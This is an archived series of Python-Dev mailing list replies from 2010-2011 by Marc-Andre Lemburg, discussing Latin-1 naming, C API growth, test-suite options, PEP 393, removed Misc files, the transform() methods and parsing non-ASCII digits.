http://www.egenix.com/company/contact/ ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] Strange error importing a Pickle from 2.7 to 3.2
Alexander Belopolsky wrote: On Wed, Feb 23, 2011 at 4:23 PM, M.-A. Lemburg m...@egenix.com wrote: .. Latin-1 is the official name and the one used internally by Python, In what sense is Latin-1 the official name? The IANA charset registry has the following listing Name: ISO_8859-1:1987[RFC1345,KXS2] MIBenum: 4 Source: ECMA registry Alias: iso-ir-100 Alias: ISO_8859-1 Alias: ISO-8859-1 (preferred MIME name) Alias: latin1 Alias: l1 Alias: IBM819 Alias: CP819 Alias: csISOLatin1 (See http://www.iana.org/assignments/character-sets) Those are registered character set names, not necessarily standard names. Anyone can apply for new aliases to get added to that list. Latin-1 spelling does appear in various unicode.org documents, but not in machine readable files as far as I can tell. Latin-1 is short for Latin Alphabet No. 1 and started out as ECMA-94 in 1985 and 1986: http://www.ecma-international.org/publications/standards/Ecma-094.htm ISO then applied their numbering scheme for the character set standard ISO-8859 in 1987 where Latin-1 became ISO-8859-1. Note that this was before the Internet took off. I assume that since the HTML standard used the more popular name Latin-1 for its definition of the default character set and also made use of the term throughout the spec, it became the de-facto standard name for that character set at the time. I only learned about the term ISO-8859-1 when starting to dive into the Unicode world late in the 1990s. Latin-1 is also sometimes written as ISO Latin-1, e.g. http://msdn.microsoft.com/en-us/library/ms537495(v=vs.85).aspx For much the same reasons, ISO-10646 never really became popular, but Unicode eventually did. ECMA-262 or ISO/IEC 16262 just doesn't sound as good as JavaScript either :-) -- Marc-Andre Lemburg eGenix.com Professional Python Services directly from the Source (#1, Feb 23 2011) Python/Zope Consulting and Support ...http://www.egenix.com/ mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/ mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/ ::: Try our new mxODBC.Connect Python Database Interface for free ! eGenix.com Software, Skills and Services GmbH Pastor-Loeh-Str.48 D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg Registered at Amtsgericht Duesseldorf: HRB 46611 http://www.egenix.com/company/contact/ ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] API bloat
Mark Shannon wrote: Nick Coghlan wrote: On Thu, Feb 10, 2011 at 8:16 PM, Mark Shannon ma...@dcs.gla.ac.uk wrote: Doing a search for the regex: PyAPI_FUNC\([^)]*\) *Py in .h files, which should match API functions (functions starting _Py are excluded) gives the following result: Version matches 3.0 717 3.1.3 728 3.2b2 743 It would appear the API bloat is real, not just an artefact of updated docs. Since it doesn't account for #ifdef, a naive count like that isn't a valid basis for comparison. OK. How about this: egrep -ho '#.*PyAPI_FUNC\([^)]*\)( |\n)*Py\w+' Include/*.h finds no matches. egrep -ho 'PyAPI_FUNC\([^)]*\)( |\n)*Py\w+' Include/*.h | sort -u This finds all matches and removes duplicates, so anything defined multiple time in branches of #ifdef blocks, will only be counted once. Version matches 3.0 714 3.1.3 725 3.2b2 739 Given these numbers, I don't think the subject line really captures the problem accurately enough ... a 2% increase in number of API function per release can hardly be called API bloat :-) So given, the revised numbers; The what's new for 3.2 API section: http://docs.python.org/dev/py3k/whatsnew/3.2.html#build-and-c-api-changes lists 6 new functions, yet 14 have been added between 3.1.3 and 3.2b2. Could you identify the ones that are not yet documented ? That would be useful. Thanks, -- Marc-Andre Lemburg eGenix.com Professional Python Services directly from the Source (#1, Feb 10 2011) Python/Zope Consulting and Support ...http://www.egenix.com/ mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/ mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/ ::: Try our new mxODBC.Connect Python Database Interface for free ! eGenix.com Software, Skills and Services GmbH Pastor-Loeh-Str.48 D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg Registered at Amtsgericht Duesseldorf: HRB 46611 http://www.egenix.com/company/contact/ ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] API bloat
Mark Shannon wrote: M.-A. Lemburg wrote: Mark Shannon wrote: Nick Coghlan wrote: On Thu, Feb 10, 2011 at 8:16 PM, Mark Shannon ma...@dcs.gla.ac.uk wrote: Doing a search for the regex: PyAPI_FUNC\([^)]*\) *Py in .h files, which should match API functions (functions starting _Py are excluded) gives the following result: Version matches 3.0 717 3.1.3 728 3.2b2 743 It would appear the API bloat is real, not just an artefact of updated docs. Since it doesn't account for #ifdef, a naive count like that isn't a valid basis for comparison. OK. How about this: egrep -ho '#.*PyAPI_FUNC\([^)]*\)( |\n)*Py\w+' Include/*.h finds no matches. egrep -ho 'PyAPI_FUNC\([^)]*\)( |\n)*Py\w+' Include/*.h | sort -u This finds all matches and removes duplicates, so anything defined multiple time in branches of #ifdef blocks, will only be counted once. Version matches 3.0 714 3.1.3 725 3.2b2 739 Given these numbers, I don't think the subject line really captures the problem accurately enough ... a 2% increase in number of API function per release can hardly be called API bloat :-) So given, the revised numbers; The what's new for 3.2 API section: http://docs.python.org/dev/py3k/whatsnew/3.2.html#build-and-c-api-changes lists 6 new functions, yet 14 have been added between 3.1.3 and 3.2b2. Could you identify the ones that are not yet documented ? That would be useful. Here's the details: The following API functions were removed from 3.1.3: PyAST_Compile PyCObject_AsVoidPtr PyCObject_FromVoidPtr PyCObject_FromVoidPtrAndDesc PyCObject_GetDesc PyCObject_Import PyCObject_SetVoidPtr PyCode_CheckLineNumber Py_CompileStringFlags PyEval_CallObject PyOS_ascii_atof PyOS_ascii_formatd PyOS_ascii_strtod PyThread_exit_prog PyThread__PyThread_exit_prog PyThread__PyThread_exit_thread PyUnicode_SetDefaultEncoding And the following were added to 3.2, of which only 2 are documented: PyArg_ValidateKeywordArguments PyAST_CompileEx Py_CompileString Py_CompileStringExFlags PyErr_NewExceptionWithDoc(documented) PyErr_SyntaxLocationEx PyErr_WarnFormat PyFrame_GetLineNumber PyImport_ExecCodeModuleWithPathnames PyImport_GetMagicTag PyLong_AsLongLongAndOverflow(documented) PyModule_GetFilenameObject Py_SetPath PyStructSequence_GetItem PyStructSequence_NewType PyStructSequence_SetItem PySys_AddWarnOptionUnicode PySys_AddXOption PySys_FormatStderr PySys_FormatStdout PySys_GetXOptions PyThread_acquire_lock_timed PyType_FromSpec PyUnicode_AsUnicodeCopy PyUnicode_AsWideCharString PyUnicode_EncodeFSDefault PyUnicode_FSDecoder Py_UNICODE_strcat Py_UNICODE_strncmp Py_UNICODE_strrchr PyUnicode_TransformDecimalToASCII For added confusion PySys_SetArgvEx is documented as new in 3.2, but exists in 3.1.3 That should keep someone busy ;) Note that this only include functions. The API also includes a number of macros such as Py_False and Py_RETURN_FALSE, types , and data like PyBool_Type. I've not tried to analyse any of these. Thanks. I opened http://bugs.python.org/issue11173 for this. -- Marc-Andre Lemburg eGenix.com Professional Python Services directly from the Source (#1, Feb 10 2011) Python/Zope Consulting and Support ...http://www.egenix.com/ mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/ mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/ ::: Try our new mxODBC.Connect Python Database Interface for free ! eGenix.com Software, Skills and Services GmbH Pastor-Loeh-Str.48 D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg Registered at Amtsgericht Duesseldorf: HRB 46611 http://www.egenix.com/company/contact/ ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] API bloat
Mark Shannon wrote: The Unicode Exception Objects section is new and seemingly redundant: http://docs.python.org/py3k/c-api/exceptions.html#unicode-exception-objects Should this be in the public API? Those function have been in the public API since we introduced Unicode callbak error handlers. It was an oversight that these were not documented in the Python documentation. They have been documented part of the unicodeobject.h ever since they were introduced. Note that these APIs are needed by codecs supporting the callback error handlers, and since performance matters a lot for codecs, the C APIs were introduced. -- Marc-Andre Lemburg eGenix.com Professional Python Services directly from the Source (#1, Feb 09 2011) Python/Zope Consulting and Support ...http://www.egenix.com/ mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/ mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/ ::: Try our new mxODBC.Connect Python Database Interface for free ! eGenix.com Software, Skills and Services GmbH Pastor-Loeh-Str.48 D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg Registered at Amtsgericht Duesseldorf: HRB 46611 http://www.egenix.com/company/contact/ ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] Python Unit Tests
Wesley Mesquita wrote: Hi all, I starting to explore python 3k core development environment. So, sorry in advance for any mistakes, but I really don't know what is the best list to post this, since it not a use of python issue, and probably is not a dev issue, it is more like a dev env question. I have ran the test suit, and got the messages below. ~/python_dev/python$ make testall ./python -Wd -E -bb ./Lib/test/regrtest.py -uall -l == CPython 3.2rc2+ (py3k:88376, Feb 7 2011, 18:31:28) [GCC 4.4.5] == Linux-2.6.35-24-generic-x86_64-with-debian-squeeze-sid little-endian == /home/wesley/python_dev/python/build/test_python_3387 Testing with flags: sys.flags(debug=0, division_warning=0, inspect=0, interactive=0, optimize=0, dont_write_bytecode=0, no_user_site=0, no_site=0, ignore_environment=1, verbose=0, bytes_warning=2, quiet=0) [...] [198/349] test_ossaudiodev test_ossaudiodev skipped -- [Errno 2] No such file or directory: '/dev/dsp' [...] [200/349] test_parser Expecting 's_push: parser stack overflow' in next line s_push: parser stack overflow [...] [321/349] test_urllib2net /home/wesley/python_dev/python/Lib/socket.py:333: ResourceWarning: unclosed socket.socket object, fd=8, family=2, type=2049, proto=6 self._sock = None /home/wesley/python_dev/python/Lib/urllib/request.py:2134: ResourceWarning: unclosed socket.socket object, fd=7, family=2, type=2049, proto=6 sys.exc_info()[2]) /home/wesley/python_dev/python/Lib/urllib/request.py:2134: ResourceWarning: unclosed socket.socket object, fd=8, family=2, type=2049, proto=6 sys.exc_info()[2]) /home/wesley/python_dev/python/Lib/socket.py:333: ResourceWarning: unclosed socket.socket object, fd=8, family=2, type=1, proto=6 self._sock = None /home/wesley/python_dev/python/Lib/socket.py:333: ResourceWarning: unclosed socket.socket object, fd=9, family=2, type=1, proto=6 self._sock = None /home/wesley/python_dev/python/Lib/socket.py:333: ResourceWarning: unclosed socket.socket object, fd=9, family=2, type=2049, proto=6 self._sock = None /home/wesley/python_dev/python/Lib/socket.py:333: ResourceWarning: unclosed socket.socket object, fd=7, family=2, type=2049, proto=6 self._sock = None [323/349] test_urllibnet /home/wesley/python_dev/python/Lib/socket.py:333: ResourceWarning: unclosed socket.socket object, fd=7, family=2, type=1, proto=6 self._sock = None 24 tests skipped: test_bz2 test_curses test_dbm_gnu test_dbm_ndbm test_gdb test_kqueue test_ossaudiodev test_readline test_smtpnet test_socketserver test_sqlite test_ssl test_startfile test_tcl test_timeout test_tk test_ttk_guionly test_ttk_textonly test_urllib2net test_urllibnet test_winreg test_winsound test_xmlrpc_net test_zipfile64 9 skips unexpected on linux2: test_bz2 test_dbm_gnu test_dbm_ndbm test_readline test_ssl test_tcl test_tk test_ttk_guionly test_ttk_textonly sys:1: ResourceWarning: unclosed file _io.TextIOWrapper name='/dev/null' mode='a' encoding='UTF-8' But running each of them individually: :~/python_dev/python$ ./python Lib/test/regrtest.py test_ossaudiodev [1/1] test_ossaudiodev test_ossaudiodev skipped -- Use of the `audio' resource not enabled 1 test skipped: test_ossaudiodev Those skips are all expected on linux2. ./python Lib/test/regrtest.py test_parser [1/1] test_parser Expecting 's_push: parser stack overflow' in next line s_push: parser stack overflow 1 test OK. ./python Lib/test/regrtest.py test_urllib2net[1/1] test_urllib2net test_urllib2net skipped -- Use of the `network' resource not enabled 1 test skipped: test_urllib2net Those skips are all expected on linux2. Is there any reason for the different results? Yes: you are not using the same options on the stand-alone tests as you are on the suite run. Most importantly, you are not enabling all resources (-uall). -- Marc-Andre Lemburg eGenix.com Professional Python Services directly from the Source (#1, Feb 08 2011) Python/Zope Consulting and Support ...http://www.egenix.com/ mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/ mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/ ::: Try our new mxODBC.Connect Python Database Interface for free ! eGenix.com Software, Skills and Services GmbH Pastor-Loeh-Str.48 D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg Registered at Amtsgericht Duesseldorf: HRB 46611 http://www.egenix.com/company/contact/ ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] PEP 393: Flexible String Representation
I'll comment more on this later this week... From my first impression, I'm not too thrilled by the prospect of making the Unicode implementation more complicated by having three different representations on each object. I also don't see how this could save a lot of memory. As an example take a French text with say 10mio code points. This would end up appearing in memory as 3 copies on Windows: one copy stored as UCS2 (20MB), one as Latin-1 (10MB) and one as UTF-8 (probably around 15MB, depending on how many accents are used). That's a saving of -10MB compared to today's implementation :-) Martin v. Löwis wrote: I have been thinking about Unicode representation for some time now. This was triggered, on the one hand, by discussions with Glyph Lefkowitz (who complained that his server app consumes too much memory), and Carl Friedrich Bolz (who profiled Python applications to determine that Unicode strings are among the top consumers of memory in Python). On the other hand, this was triggered by the discussion on supporting surrogates in the library better. I'd like to propose PEP 393, which takes a different approach, addressing both problems simultaneously: by getting a flexible representation (one that can be either 1, 2, or 4 bytes), we can support the full range of Unicode on all systems, but still use only one byte per character for strings that are pure ASCII (which will be the majority of strings for the majority of users). You'll find the PEP at http://www.python.org/dev/peps/pep-0393/ For convenience, I include it below. -- Marc-Andre Lemburg eGenix.com Professional Python Services directly from the Source (#1, Jan 25 2011) Python/Zope Consulting and Support ...http://www.egenix.com/ mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/ mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/ ::: Try our new mxODBC.Connect Python Database Interface for free ! eGenix.com Software, Skills and Services GmbH Pastor-Loeh-Str.48 D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg Registered at Amtsgericht Duesseldorf: HRB 46611 http://www.egenix.com/company/contact/ ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] [Python-checkins] r88127 - in python/branches/py3k/Misc: README.AIX README.OpenBSD cheatsheet
brett.cannon wrote: Author: brett.cannon Date: Thu Jan 20 20:34:35 2011 New Revision: 88127 Log: Remove some outdated files from Misc. Removed: python/branches/py3k/Misc/README.AIX Are you sure that the AIX README is outdated ? It explains some of the details of why there are scripts like ld_so_aix which are still needed on AIX. python/branches/py3k/Misc/README.OpenBSD Same here. Does OpenBSD 4.x still have the issues mentioned in the file. python/branches/py3k/Misc/cheatsheet Wouldn't it be better to update this useful file (as part of your PSF grant) ? Most of it still applies to Py3. Regarding some other things you removed or moved: DSVN-Python3/Misc/maintainers.rst DSVN-Python3/Misc/developers.txt Why were these removed from the source archive ? They are useful to have around for users wanting to report bugs and are useful to follow the development of the core team between different Python versions. DSVN-Python3/Misc/python-mode.el Why is this gone ? It's a useful file for Emacs users and usually more recent than what you get with your Emacs installation. DSVN-Python3/Misc/AIX-NOTES I guess this was renamed to README.AIX before you removed it. See above. DSVN-Python3/Misc/PURIFY.README Why is this outdated ? Should probably be renamed to README.Purify. DSVN-Python3/Misc/RFD That's a piece of Python history. These nuggets should stay in the Python source archive, IMHO. DSVN-Python3/Misc/setuid-prog.c This is useful for people writing setuid programs in Python and avoids many of the usual pitfalls: http://mail.python.org/pipermail/python-list/1999-April/620658.html -- Marc-Andre Lemburg eGenix.com Professional Python Services directly from the Source (#1, Jan 20 2011) Python/Zope Consulting and Support ...http://www.egenix.com/ mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/ mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/ ::: Try our new mxODBC.Connect Python Database Interface for free ! eGenix.com Software, Skills and Services GmbH Pastor-Loeh-Str.48 D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg Registered at Amtsgericht Duesseldorf: HRB 46611 http://www.egenix.com/company/contact/ ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] Tools/unicode
Michael Foord wrote: On 03/01/2011 15:39, Alexander Belopolsky wrote: On Mon, Jan 3, 2011 at 10:33 AM, Michael Foordmich...@voidspace.org.uk wrote: .. If someone knows if this tool is still used/useful then please let us know how the description should best be updated. If there are no replies I'll remove it. If you are talking about Tools/unicode/, this is definitely a very useful tool used to generate unicodedata and encoding modules from raw unicode.org files. The description currently reads Tools used to generate unicode database files. I'll update it to read: tool used to generate unicodedata and encoding modules from raw unicode.org files Make that Tools for generating unicodedata and codecs from unicode.org and other mapping files. The scripts in that dir are not just one tool, but several tools needed to maintain the Unicode database in Python as well as generate new codecs from mapping files. -- Marc-Andre Lemburg eGenix.com Professional Python Services directly from the Source (#1, Jan 03 2011) Python/Zope Consulting and Support ...http://www.egenix.com/ mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/ mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/ ::: Try our new mxODBC.Connect Python Database Interface for free ! eGenix.com Software, Skills and Services GmbH Pastor-Loeh-Str.48 D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg Registered at Amtsgericht Duesseldorf: HRB 46611 http://www.egenix.com/company/contact/ ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] The fate of transform() and untransform() methods
Alexander Belopolsky wrote: On Fri, Dec 3, 2010 at 1:05 PM, Guido van Rossum gu...@python.org wrote: On Fri, Dec 3, 2010 at 9:58 AM, R. David Murray rdmur...@bitdance.com wrote: .. I believe MAL's thought was that the addition of these methods had been approved pre-moratorium, but I don't know if that is a sufficient argument or not. It is not. The moratorium is intended to freeze the state of the language as implemented, not whatever was discussed and approved but didn't get implemented (that'd be a hole big enough to drive a truck through, as the saying goes :-). Regardless of what I or others may have said before, I am not currently a fan of adding transform() to either str or bytes. I would like to restart the discussion under a separate subject because the original thread [1] went off the specific topic of the six new methods (2 methods x 3 types) added to builtins shortly before 3.2 beta was released. [2] The ticket that introduced the change is currently closed [3] even though the last message suggests that at least part of the change needs to be reverted. That's for Guido to decide. The moratorium, if at all, would only cover the new methods, not the other changes (readding the codecs and fixing the codecs.py module to work with bytes as well as Unicode), all of which were already discussed at length in several previous discussion, on tickets and on python-dev. I don't see much point in going through the same discussions over and over again. Fortunately, I'm on vacation next week, so don't have to go through all this again ;-) Cheers, -- Marc-Andre Lemburg eGenix.com Professional Python Services directly from the Source (#1, Dec 09 2010) Python/Zope Consulting and Support ...http://www.egenix.com/ mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/ mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/ ::: Try our new mxODBC.Connect Python Database Interface for free ! eGenix.com Software, Skills and Services GmbH Pastor-Loeh-Str.48 D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg Registered at Amtsgericht Duesseldorf: HRB 46611 http://www.egenix.com/company/contact/ ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] The fate of transform() and untransform() methods
Michael Foord wrote: On 09/12/2010 15:03, M.-A. Lemburg wrote: Alexander Belopolsky wrote: On Fri, Dec 3, 2010 at 1:05 PM, Guido van Rossumgu...@python.org wrote: On Fri, Dec 3, 2010 at 9:58 AM, R. David Murrayrdmur...@bitdance.com wrote: .. I believe MAL's thought was that the addition of these methods had been approved pre-moratorium, but I don't know if that is a sufficient argument or not. It is not. The moratorium is intended to freeze the state of the language as implemented, not whatever was discussed and approved but didn't get implemented (that'd be a hole big enough to drive a truck through, as the saying goes :-). Regardless of what I or others may have said before, I am not currently a fan of adding transform() to either str or bytes. I would like to restart the discussion under a separate subject because the original thread [1] went off the specific topic of the six new methods (2 methods x 3 types) added to builtins shortly before 3.2 beta was released. [2] The ticket that introduced the change is currently closed [3] even though the last message suggests that at least part of the change needs to be reverted. That's for Guido to decide. Well, Guido *already* said no to transform / untransform in the previous thread. I'm not sure he did and asked for clarification (see attached email). -- Marc-Andre Lemburg eGenix.com Professional Python Services directly from the Source (#1, Dec 09 2010) Python/Zope Consulting and Support ...http://www.egenix.com/ mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/ mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/ ::: Try our new mxODBC.Connect Python Database Interface for free ! eGenix.com Software, Skills and Services GmbH Pastor-Loeh-Str.48 D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg Registered at Amtsgericht Duesseldorf: HRB 46611 http://www.egenix.com/company/contact/ ---BeginMessage--- Guido van Rossum wrote: On Fri, Dec 3, 2010 at 9:58 AM, R. David Murray rdmur...@bitdance.com wrote: On Fri, 03 Dec 2010 11:14:56 -0500, Alexander Belopolsky alexander.belopol...@gmail.com wrote: On Fri, Dec 3, 2010 at 10:11 AM, R. David Murray rdmur...@bitdance.com wrote: .. Please also recall that transform/untransform was discussed before the release of Python 3.0 and was approved at the time, but it just did not get implemented before the 3.0 release. Can you provide a link? My search for transform on python-dev came out with It was linked from the issue, if I recall correctly. I do remember reading the thread from the python-3000 list, linked by someone somewhere :) http://mail.python.org/pipermail/python-dev/2010-June/100564.html where you seem to oppose these methods. Also, new methods to builtins It looks to me like I was agreeing that transform/untrasnform should do only bytes-bytes or str-str regardless of what codec name you passed them. fall under the language moratorium (but can be approved on a case-by-case basis): http://www.python.org/dev/peps/pep-3003/#case-by-case-exemptions Is there an effort to document these exceptions? I expected such approvals to be added to PEP 3003, but apparently this was not the case. I believe MAL's thought was that the addition of these methods had been approved pre-moratorium, Indeed. but I don't know if that is a sufficient argument or not. It is not. The moratorium is intended to freeze the state of the language as implemented, not whatever was discussed and approved but didn't get implemented (that'd be a hole big enough to drive a truck through, as the saying goes :-). Sure, but those two particular methods only provide interfaces to the codecs sub-system without actually requiring any major implementation changes. Furthermore, they help ease adoption of Python 3.x (quoted from PEP 3003), since the functionality they add back was removed from Python 3.0 in a way that makes it difficult to port Python2 applications to Python3. Regardless of what I or others may have said before, I am not currently a fan of adding transform() to either str or bytes. How should I read this ? Do want the methods to be removed again and added back in 3.3 ? Frankly, I'm a bit tired of constantly having to argue against cutting down the Unicode and codec support in Python3. -- Marc-Andre Lemburg eGenix.com Professional Python Services directly from the Source (#1, Dec 06 2010) Python/Zope Consulting and Support ...http://www.egenix.com/ mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/ mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/ ::: Try our new mxODBC.Connect Python Database Interface for free ! eGenix.com Software
Re: [Python-Dev] The fate of transform() and untransform() methods
Alexander Belopolsky wrote: On Thu, Dec 9, 2010 at 10:03 AM, M.-A. Lemburg m...@egenix.com wrote: Alexander Belopolsky wrote: .. The ticket that introduced the change is currently closed [3] even though the last message suggests that at least part of the change needs to be reverted. That's for Guido to decide. The decision will probably rest with the release manager, but Guido has clearly voiced his opinion. FYI: Georg explicitly asked me whether I would have the patch ready for 3.2 and since I didn't have time to work on it, he volunteered to implement it, which I'd like to thank him for ! -- Marc-Andre Lemburg eGenix.com Professional Python Services directly from the Source (#1, Dec 09 2010) Python/Zope Consulting and Support ...http://www.egenix.com/ mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/ mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/ ::: Try our new mxODBC.Connect Python Database Interface for free ! eGenix.com Software, Skills and Services GmbH Pastor-Loeh-Str.48 D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg Registered at Amtsgericht Duesseldorf: HRB 46611 http://www.egenix.com/company/contact/ ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] transform() and untransform() methods, and the codec registry
Guido van Rossum wrote: On Fri, Dec 3, 2010 at 9:58 AM, R. David Murray rdmur...@bitdance.com wrote: On Fri, 03 Dec 2010 11:14:56 -0500, Alexander Belopolsky alexander.belopol...@gmail.com wrote: On Fri, Dec 3, 2010 at 10:11 AM, R. David Murray rdmur...@bitdance.com wrote: .. Please also recall that transform/untransform was discussed before the release of Python 3.0 and was approved at the time, but it just did not get implemented before the 3.0 release. Can you provide a link? My search for transform on python-dev came out with It was linked from the issue, if I recall correctly. I do remember reading the thread from the python-3000 list, linked by someone somewhere :) http://mail.python.org/pipermail/python-dev/2010-June/100564.html where you seem to oppose these methods. Also, new methods to builtins It looks to me like I was agreeing that transform/untrasnform should do only bytes-bytes or str-str regardless of what codec name you passed them. fall under the language moratorium (but can be approved on a case-by-case basis): http://www.python.org/dev/peps/pep-3003/#case-by-case-exemptions Is there an effort to document these exceptions? I expected such approvals to be added to PEP 3003, but apparently this was not the case. I believe MAL's thought was that the addition of these methods had been approved pre-moratorium, Indeed. but I don't know if that is a sufficient argument or not. It is not. The moratorium is intended to freeze the state of the language as implemented, not whatever was discussed and approved but didn't get implemented (that'd be a hole big enough to drive a truck through, as the saying goes :-). Sure, but those two particular methods only provide interfaces to the codecs sub-system without actually requiring any major implementation changes. Furthermore, they help ease adoption of Python 3.x (quoted from PEP 3003), since the functionality they add back was removed from Python 3.0 in a way that makes it difficult to port Python2 applications to Python3. Regardless of what I or others may have said before, I am not currently a fan of adding transform() to either str or bytes. How should I read this ? Do want the methods to be removed again and added back in 3.3 ? Frankly, I'm a bit tired of constantly having to argue against cutting down the Unicode and codec support in Python3. -- Marc-Andre Lemburg eGenix.com Professional Python Services directly from the Source (#1, Dec 06 2010) Python/Zope Consulting and Support ...http://www.egenix.com/ mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/ mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/ ::: Try our new mxODBC.Connect Python Database Interface for free ! eGenix.com Software, Skills and Services GmbH Pastor-Loeh-Str.48 D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg Registered at Amtsgericht Duesseldorf: HRB 46611 http://www.egenix.com/company/contact/ ___ Python-Dev mailing list Python-Dev@python.org http://mail.python.org/mailman/listinfo/python-dev Unsubscribe: http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com
Re: [Python-Dev] Python and the Unicode Character Database
Alexander Belopolsky wrote: On Thu, Dec 2, 2010 at 5:58 PM, M.-A. Lemburg m...@egenix.com wrote: .. I will change my mind on this issue when you present a machine-readable file with Arabic-Indic numerals and a program capable of reading it and show that this program uses the same number parsing algorithm as Python's int() or float(). Have you had a look at the examples I posted ? They include texts and tables with numbers written using east asian arabic numerals. Yes, but this was all about output. I am pretty sure TeX was able to typeset Qur'an in all its glory long before Unicode was invented. Yet, in machine readable form it would be something like {\quran 1} (invented directive). I have asked for a file that is intended for machine processing, not for human enjoyment in print or on a display. I claim that if such file exists, the program that reads it does not use the same rules as Python and converting non-ascii digits would be a tiny portion of what that program does. Well, programs that take input from the keyboards I posted in this thread will have to deal with the digits. Since Python's input() accepts keyboard input, you have your use case :-) Seriously, I find the distinction between input and output forms of numerals somewhat misguided. Any output can also serve as input. For books and other printed material, images, etc. you have scanners and OCR. For screen output you have screen readers. For spreadsheets and data, you have CSV, TSV, XML, etc. etc. etc. Just for the fun of it, I created a CSV file with Thai and Dzongkha numerals (in addition to Arabic ones) using OpenOffice. Here's the cut and paste version: Numbers in various scripts Arabic ThaiDzongkha 1 ๑ ༡ 2 ๒ ༢ 3 ๓ ༣ 4 ๔ ༤ 5 ๕ ༥ 6 ๖ ༦ 7 ๗ ༧ 8 ๘ ༨ 9 ๙ ༩ 10 ๑๐ ༡༠ 11 ๑๑ ༡༡ 12 ๑๒ ༡༢ 13 ๑๓ ༡༣ 14 ๑๔ ༡༤ 15 ๑๕ ༡༥ 16 ๑๖ ༡༦ 17 ๑๗ ༡༧ 18 ๑๘ ༡༨ 19 ๑๙ ༡༩ 20 ๒๐ ༢༠ And here's the script that goes with it: import csv c = csv.reader(open('Numbers-in-various-scripts.csv')) headers = [c.next() for i in range(3)] while c: print [int(unicode(x, 'utf-8')) for x in c.next()] and the output using Python 2.7: [1, 1, 1] [2, 2, 2] [3, 3, 3] [4, 4, 4] [5, 5, 5] [6, 6, 6] [7, 7, 7] [8, 8, 8] [9, 9, 9] [10, 10, 10] [11, 11, 11] [12, 12, 12] [13, 13, 13] [14, 14, 14] [15, 15, 15] [16, 16, 16] [17, 17, 17] [18, 18, 18] [19, 19, 19] [20, 20, 20] If you need more such files, I can generate as many as you like ;-) I can send the OOo file as well, if you like to play around with it. I'd say: case closed :-) -- Marc-Andre Lemburg eGenix.com Professional Python Services directly from the Source (#1, Dec 03 2010) Python/Zope Consulting and Support ...http://www.egenix.com/ mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/ mxODBC, mxDateTime, mxTextTools 